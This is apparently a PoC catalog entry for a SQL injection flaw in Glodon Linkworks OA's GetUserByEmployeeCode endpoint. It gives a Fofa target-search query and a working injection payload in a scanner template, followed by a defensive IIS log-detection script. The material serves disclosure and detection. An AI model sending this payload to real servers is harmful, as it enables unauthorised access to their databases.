glodon-linkworks-gwgdwebservice-sqli: Glodon Linkworks GWGdWebService SQL Injection

Date: 2025-09-01 | Affected software: Glodon Linkworks GWGdWebService | POC: public

Vulnerability Description

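The GWGdWebService interface of the Glodon Linkworks office OA has a SQL injection vulnerability. After sending the request packet, sensitive information in the database can be obtained.

Fofa: header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"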

PoC code [public]

id: glodon-linkworks-gwgdwebservice-sqli

info:
  name: 广联达 Linkworks GWGdWebService SQL 注入
  author: zan8in
  severity: high
  verified: true
  description: |
    广联达 Linkworks办公OA GWGdWebService接口存在SQL注入漏洞,发送请求包后可以获取数据库中的敏感信息
    Fofa: header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"
  reference:
    - https://github.com/zan8in/pocwiki/blob/main/%E5%B9%BF%E8%81%94%E8%BE%BE-linkworks-gwgdwebservice%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  tags: glodon,sqli
  created: 2024/02/01

rules:
  r0:
    request:
      method: POST
      path: /Org/service/Service.asmx/GetUserByEmployeeCode
      body: employeeCode=1'-1/user--'&EncryptData=1
    expression: response.status == 500 && response.body.bcontains(b'在将 nvarchar 值') && response.body.bcontains(b'转换成数据类型 int 时失败')
expression: r0()
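
For defenders, the rule above implies a log signature: a POST to `/Org/service/Service.asmx/GetUserByEmployeeCode` that ends in HTTP 500. The following is an added example, not part of the original PoC or the project's code; it assumes IIS W3C logs with the standard `cs-method`, `cs-uri-stem`, `sc-status` and `c-ip` fields, and the function names and sample log are constructed for illustration.

```python
from collections import Counter

# Endpoint and status code taken from the PoC rule on this page.
# IIS paths are case-insensitive, so comparison is done in lower case.
TARGET_PATH = "/org/service/service.asmx/getuserbyemployeecode"

# Constructed sample IIS W3C log (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2025-09-01 08:00:01 198.51.100.7 POST /Org/service/Service.asmx/GetUserByEmployeeCode - 500
2025-09-01 08:00:02 198.51.100.7 POST /org/service/service.asmx/getuserbyemployeecode - 500
2025-09-01 08:00:05 192.0.2.10 POST /Org/service/Service.asmx/GetUserByEmployeeCode - 200
2025-09-01 08:00:09 203.0.113.4 GET /Services/Identification/login.ashx - 200
#Fields: date time cs-method cs-uri-stem sc-status c-ip
2025-09-01 09:10:00 POST /Org/service/Service.asmx/GetUserByEmployeeCode 500 203.0.113.4
"""

def find_suspect_requests(log_text):
    """Return parsed rows for POSTs to the endpoint that ended in HTTP 500."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]   # column layout can change mid-file
            continue
        if not line or line.startswith("#") or not fields:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue                    # truncated or malformed row
        row = dict(zip(fields, values))
        if (row.get("cs-method", "").upper() == "POST"
                and row.get("cs-uri-stem", "").lower() == TARGET_PATH
                and row.get("sc-status") == "500"):
            hits.append(row)
    return hits

def hits_by_client(log_text):
    """Count matching requests per client IP for triage."""
    return Counter(r.get("c-ip", "?") for r in find_suspect_requests(log_text))

if __name__ == "__main__":
    for ip, n in hits_by_client(SAMPLE_LOG).most_common():
        print(f"{ip}\t{n} POST(s) to GetUserByEmployeeCode returned 500")
```

IIS does not log POST bodies by default, so the `employeeCode` value itself is not visible here; the path and status pair is the part of the rule that survives in access logs.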
